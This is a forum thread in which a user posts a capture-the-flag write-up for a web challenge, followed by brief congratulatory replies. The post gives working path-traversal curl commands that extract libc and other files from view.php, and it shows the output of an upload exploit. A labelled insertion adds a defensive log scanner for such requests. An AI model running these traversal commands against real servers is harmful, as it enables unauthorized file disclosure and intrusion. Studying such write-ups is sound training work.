Under the web (MEDIUM) WriteUp
by Phoka - Tuesday February 25, 2025 at 04:29 AM
#1
First save the libc.so.6 file from the web (LFI) to your current dir

curl -s 'http://94.237.54.42:49922/view.php?image=/../../../../usr/lib/x86_64-linux-gnu/libc.so.6' | grep -oP 'data:image/png;base64,[^"]+' | sed 's/^data:image\/png;base64,//' | base64 -d > ./libc.so.6

___________________________________________________________________________________________________________________
.
├── Dockerfile
├── flag.txt
├── index.php
├── libc.so.6
├── metadata_reader.so
├── start.sh
├── upload.php
├── uploads
│   ├── starry_night.png
│   └── the_potato_eaters.png
└── view.php
________________________________________________________________________________________________________

We will need to upload a picture to the web (PNG).

We will use a script for that.

Copy any normal PNG to your current dir,
name it Picture.png
before running the script.


after running the script 

python exploit.py IP : Port
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[+] Opening connection to 94.2.5.6 on port 585: Done
[+] Receiving all data: Done (41.78KB)
[*]Closed connection to 94.2.4.6 port 585
[+] Found metadata_reader.so base: 7f7161a29000 (0x7f7161a29000)
Resetting Picture.png first...
STDOUT:      1 image files updated
STDOUT:      1 image files updated
STDOUT:      1 image files updated
STDOUT:      1 image files updated
STDOUT: 
File uploaded successfully
<script>alert('File uploaded successfully as Picture.png');</script>
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
run curl -s 'http://94.2.5.6:585/view.php?image=/app/test.png' | grep -oP 'data:image/png;base64,[^"]+' | sed 's/^data:image\/png;base64,//' | base64 -d
then you will see the path of the exploit path, then the final command is
curl -s 'http://94.2.5.6:585/view.php?image=/app/$$$the path of the exploit path$$$' | grep -oP 'data:image/png;base64,[^"]+' | sed 's/^data:image\/png;base64,//' | base64 -d
HTB{H4ck!ng_w3b_fr0m....}
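Added example, not part of the post above or of the challenge's code: a defender-side access-log check for the two request shapes sent to view.php in the write-up (dot-dot segments in `image`, and an absolute path outside the upload directory). The upload directory `/app/uploads`, the log format and the sample lines are assumptions constructed for illustration.

```python
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

UPLOAD_DIR = "/app/uploads"  # assumption: the only directory view.php should serve
LINE_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3}) ')

# Constructed access-log lines (combined log format, documentation IP ranges).
SAMPLE_LOG = """\
203.0.113.7 - - [25/Feb/2025:04:10:01 +0000] "GET /view.php?image=starry_night.png HTTP/1.1" 200 51234
203.0.113.9 - - [25/Feb/2025:04:11:12 +0000] "GET /view.php?image=/../../../../usr/lib/x86_64-linux-gnu/libc.so.6 HTTP/1.1" 200 2900112
203.0.113.9 - - [25/Feb/2025:04:12:40 +0000] "GET /view.php?image=/app/test.png HTTP/1.1" 200 412
203.0.113.9 - - [25/Feb/2025:04:13:02 +0000] "GET /view.php?image=%252e%252e%252fetc%252fhostname HTTP/1.1" 200 88
198.51.100.4 - - [25/Feb/2025:04:14:30 +0000] "GET /view.php?image=/app/uploads/the_potato_eaters.png HTTP/1.1" 200 60211
"""

def escape_reason(value, base=UPLOAD_DIR):
    """Return why `value` points outside `base`, or None if it stays inside."""
    for _ in range(3):  # undo nested percent-encoding such as %252e
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    value = value.replace("\\", "/")
    if ".." in value.split("/"):
        return "dot-dot segment"
    if value.startswith("/"):
        resolved = posixpath.normpath(value)
        if resolved != base and not resolved.startswith(base + "/"):
            return "absolute path outside upload dir"
    return None

def scan(log_text):
    """Return (client, image value, reason, status) for suspicious view.php requests."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        url = urlsplit(m.group(2)) if m else None
        if url is None or not url.path.endswith("/view.php"):
            continue
        for value in parse_qs(url.query).get("image", []):  # parse_qs decodes once
            reason = escape_reason(value)
            if reason:
                hits.append((m.group(1), value, reason, int(m.group(3))))
    return hits

if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```

A 200 status with a large response size on a flagged line, as in the second sample line, is the signal that the file was actually read and returned.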
#2
LOL nice phoka! I did it nicely in 1st 50th position
#3
(Feb 25, 2025, 08:22 AM)cavour13 Wrote: LOL nice phoka! I did it nicely in 1st 50th position

Cool bros <3 that really is nice man 
keep up the great work
#4
Good write-up! I really learned something from this. Thanks!
#5
(Mar 14, 2025, 02:28 PM)hellme Wrote: Good write-up! I really learned something from this. Thanks!

Cool boss

you must be really good at coding Python 
because this code became a write-up to you, that means you went through the functions of the code

right??